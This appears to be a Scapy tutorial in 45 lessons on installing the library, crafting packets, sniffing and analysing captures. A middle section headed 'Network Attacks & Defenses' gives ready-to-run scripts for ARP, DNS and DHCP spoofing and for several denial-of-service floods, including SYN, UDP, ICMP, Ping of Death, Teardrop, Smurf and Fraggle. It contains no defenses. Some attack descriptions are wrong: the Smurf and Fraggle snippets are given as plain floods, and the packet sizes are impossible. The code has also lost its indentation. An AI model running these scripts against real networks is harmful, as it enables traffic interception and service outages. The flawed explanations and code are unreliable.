Setup Your Environment
Lesson 1: Install Scapy
pip install scapyLesson 2: Verify Installation
scapy --versionLesson 3: Running Scapy in Interactive Mode
scapyLesson 4: Installing Scapy on Linux
sudo apt-get install scapyLesson 5: Installing Scapy on Windows
pip install scapyLesson 6: Installing Scapy on macOS
brew install scapyLesson 7: Updating Scapy
pip install --upgrade scapyLesson 8: Running Scapy as Root
sudo scapyLesson 9: Setting Up Scapy Environment Variables
export SCAPY_VERBOSE=0Lesson 10: Understanding Scapy's Dependencies
pip show scapyBasics of Scapy
Lesson 11: Creating Simple Packets
from scapy.all import *
packet = IP(dst="8.8.8.8")/ICMP()
send(packet)
Lesson 12: Capturing Packets
from scapy.all import sniff
packets = sniff(count=5)
packets.show()
Lesson 13: Displaying Packet Summary
packet = IP(dst="8.8.8.8")/ICMP()
packet.show()
Lesson 14: Sending TCP Packets
packet = IP(dst="8.8.8.8")/TCP(dport=80)
send(packet)
Lesson 15: Saving and Loading Packets
from scapy.all import wrpcap, rdpcap
wrpcap('my_packets.pcap', packets)
loaded_packets = rdpcap('my_packets.pcap')
loaded_packets.show()
Intermediate Techniques
Lesson 16: Crafting Custom Packets
packet = IP(dst="192.168.1.1")/TCP(dport=1234, sport=12345, flags="S")
packet.show()
Lesson 17: Manipulating Packet Fields
packet = IP(dst="192.168.1.1")/TCP(dport=80)
packet[IP].ttl = 64
packet.show()
Lesson 18: Using Scapy with Other Tools
from scapy.all import sr1
response = sr1(IP(dst="example.com")/ICMP())
response.show()
Lesson 19: Advanced Packet Analysis
packets = sniff(count=10)
for packet in packets:
if packet.haslayer(TCP):
print(packet[TCP].payload)
Lesson 20: Packet Injection Techniques
packet = IP(dst="192.168.1.1")/ICMP()
send(packet, verbose=0)
Advanced Techniques
Lesson 21: Building Complex Packet Sequences
packet = IP(dst="192.168.1.1")/TCP(dport=80)/Raw(b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
send(packet)
Lesson 22: Performing Network Scanning
from scapy.all import ARP, Ether, srp
arp = ARP(pdst="192.168.1.1/24")
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
request = broadcast/arp
result = srp(request, timeout=3, verbose=0)[0]
for sent, received in result:
print(received.psrc)
Lesson 23: Detecting and Handling Packet Flooding
packets = sniff(timeout=10)
for packet in packets:
if packet.haslayer(ICMP):
print(packet.summary())
Lesson 24: Implementing Protocol Decoding
from scapy.all import IP, TCP
def custom_packet_handler(packet):
if packet.haslayer(IP):
ip_layer = packet.getlayer(IP)
print(f"IP Layer: {ip_layer.src} -> {ip_layer.dst}")
sniff(prn=custom_packet_handler, count=5)
Lesson 25: Optimizing Scapy Performance
from scapy.all import conf
conf.verb = 0
Network Attacks & Defenses
ARP Spoofing: A type of attack where an attacker sends false ARP (Address Resolution Protocol) messages to associate the attacker's MAC address with the IP address of a legitimate device on the network.
from scapy.all import ARP, Ether, send
arp_response = ARP(op=2, pdst="192.168.1.1", psrc="192.168.1.100", hwdst="ff:ff:ff:ff:ff:ff")
send(Ether(dst="ff:ff:ff:ff:ff:ff")/arp_response)
DNS Spoofing: A type of attack where an attacker alters the DNS (Domain Name System) lookup to redirect users to fake or malicious websites.
from scapy.all import DNS, DNSRR, IP, UDP, send
dns_response = IP(dst="192.168.1.1")/UDP(dport=53)/DNS(id=1, qr=1, ancount=1, an=DNSRR(rrname="example.com.", rdata="192.168.1.100"))
send(dns_response)
DHCP Spoofing: A type of attack where an attacker sets up a rogue DHCP (Dynamic Host Configuration Protocol) server to issue false IP addresses and other network settings to devices on the network.
from scapy.all import BOOTP, DHCP, Ether, IP, UDP, send
dhcp_offer = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="192.168.1.1")/UDP(sport=67, dport=68)/BOOTP(op=2, yiaddr="192.168.1.100")/DHCP(options=[("message-type", "offer"), ("server_id", "192.168.1.1"), "end"])
send(dhcp_offer)
TCP SYN Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of SYN (synchronize) packets to a server, overwhelming it and making it unavailable to legitimate users.
from scapy.all import IP, TCP, send
for i in range(1000):
send(IP(dst="192.168.1.1")/TCP(dport=80, flags="S"))
TCP ACK Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of ACK (acknowledgment) packets to a server, overwhelming it and making it unavailable to legitimate users.
from scapy.all import IP, TCP, send
for i in range(1000):
send(IP(dst="192.168.1.1")/TCP(dport=80, flags="A"))
UDP Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of UDP (User Datagram Protocol) packets to a server, overwhelming it and making it unavailable to legitimate users.
from scapy.all import IP, UDP, send
for i in range(1000):
send(IP(dst="192.168.1.1")/UDP(dport=80))
ICMP Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of ICMP (Internet Control Message Protocol) packets to a server, overwhelming it and making it unavailable to legitimate users.
from scapy.all import IP, ICMP, send
for i in range(1000):
send(IP(dst="192.168.1.1")/ICMP())
Ping of Death: A type of denial-of-service (DoS) attack where an attacker sends a large ICMP echo request packet to a server, causing it to crash or become unavailable.
from scapy.all import IP, ICMP, send
packet = IP(dst="192.168.1.1")/ICMP()/b"A" * 65535
send(packet)
Land Attack: A type of denial-of-service (DoS) attack where an attacker sends a TCP SYN packet with the same source and destination IP address and port number, causing the server to crash or become unavailable.
from scapy.all import IP, TCP, send
packet = IP(src="192.168.1.1", dst="192.168.1.1")/TCP(sport=80, dport=80, flags="S")
send(packet)
Teardrop Attack: A type of denial-of-service (DoS) attack where an attacker sends a series of fragmented packets to a server, causing it to crash or become unavailable.
from scapy.all import IP, TCP, fragment, send
packet = IP(dst="192.168.1.1")/TCP(dport=80)/b"A" * 65535
fragments = fragment(packet, fragsize=800)
for frag in fragments:
send(frag)
Smurf Attack: A type of denial-of-service (DoS) attack where an attacker sends a large number of ICMP echo request packets to a server, overwhelming it and making it unavailable to legitimate users.
from scapy.all import IP, ICMP, send
for i in range(1000):
send(IP(dst="192.168.1.1", src="192.168.1.2")/ICMP())
Fraggle Attack: A type of denial-of-service (DoS) attack where an attacker sends a large number of UDP packets to a server, overwhelming it and making it unavailable to legitimate users.
from scapy.all import IP, UDP, send
for i in range(1000):
send(IP(dst="192.168.1.1")/UDP(dport=7))
Scripting & Automation
Lesson 26: Writing Scapy Scripts
from scapy.all import *
def create_packet(destination):
packet = IP(dst=destination)/ICMP()
return packet
packet = create_packet("8.8.8.8")
send(packet)
Lesson 27: Automating Packet Analysis
from scapy.all import sniff
def packet_callback(packet):
if packet.haslayer(TCP):
print(packet.summary())
sniff(prn=packet_callback, count=10)
Lesson 28: Integrating Scapy with Python Scripts
from scapy.all import *
def send_custom_packet(dst_ip):
packet = IP(dst=dst_ip)/TCP(dport=80, flags="S")
send(packet)
send_custom_packet("192.168.1.1")
Lesson 29: Using Scapy for Scheduled Tasks
import time
from scapy.all import *
while True:
packet = IP(dst="192.168.1.1")/ICMP()
send(packet)
time.sleep(60) # send a packet every 60 seconds
Lesson 30: Automating Packet Capture and Analysis
from scapy.all import sniff
def packet_analysis(packet):
print(packet.summary())
sniff(prn=packet_analysis, timeout=60)
Network Protocols
Lesson 31: Working with IP Protocols
from scapy.all import IP
packet = IP(dst="192.168.1.1")
packet.show()
Lesson 32: Understanding TCP/IP
from scapy.all import IP, TCP
packet = IP(dst="192.168.1.1")/TCP(dport=80)
packet.show()
Lesson 33: Exploring UDP Traffic
from scapy.all import IP, UDP
packet = IP(dst="192.168.1.1")/UDP(dport=1234)
packet.show()
Lesson 34: Analyzing ICMP Messages
from scapy.all import IP, ICMP
packet = IP(dst="8.8.8.8")/ICMP()
packet.show()
Lesson 35: Inspecting ARP Packets
from scapy.all import ARP, Ether
packet = Ether()/ARP(pdst="192.168.1.1")
packet.show()
Packet Manipulation
Lesson 36: Crafting Custom Packets
from scapy.all import IP, TCP
packet = IP(dst="192.168.1.1")/TCP(dport=80, sport=12345, flags="S")
packet.show()
Lesson 37: Modifying Packet Fields
from scapy.all import IP, TCP
packet = IP(dst="192.168.1.1")/TCP(dport=80)
packet[IP].ttl = 64
packet.show()
Lesson 38: Fragmenting Packets
from scapy.all import IP, TCP, fragment
packet = IP(dst="192.168.1.1")/TCP(dport=80)/b"A" * 65535
fragments = fragment(packet, fragsize=800)
for frag in fragments:
frag.show()
Lesson 39: Reassembling Fragmented Packets
from scapy.all import IP, TCP, unfragment
fragments = [fragment1, fragment2] # Replace with actual fragments
reassembled_packet = unfragment(fragments)
reassembled_packet.show()
Lesson 40: Sending Raw Packets
from scapy.all import send, IP, TCP
packet = IP(dst="192.168.1.1")/TCP(dport=80, flags="S")
send(packet, raw=True)
Troubleshooting & Debugging
Lesson 41: Debugging Scapy Scripts
from scapy.all import sniff
def packet_callback(packet):
try:
packet.show()
except Exception as e:
print(f"Error: {e}")
sniff(prn=packet_callback, count=10)
Lesson 42: Analyzing Packet Capture Files
from scapy.all import rdpcap
packets = rdpcap('capture.pcap')
for packet in packets:
packet.show()
Lesson 43: Troubleshooting Network Issues
from scapy.all import ICMP, IP, sr1
response = sr1(IP(dst="192.168.1.1")/ICMP())
if response:
response.show()
else:
print("No response received")
Lesson 44: Verifying Packet Delivery
from scapy.all import IP, ICMP, sr1
response = sr1(IP(dst="192.168.1.1")/ICMP(), timeout=2)
if response:
print("Packet delivered successfully")
else:
print("Packet delivery failed")
Lesson 45: Monitoring Network Traffic
from scapy.all import sniff
def monitor_traffic(packet):
print(packet.summary())
sniff(prn=monitor_traffic, timeout=30)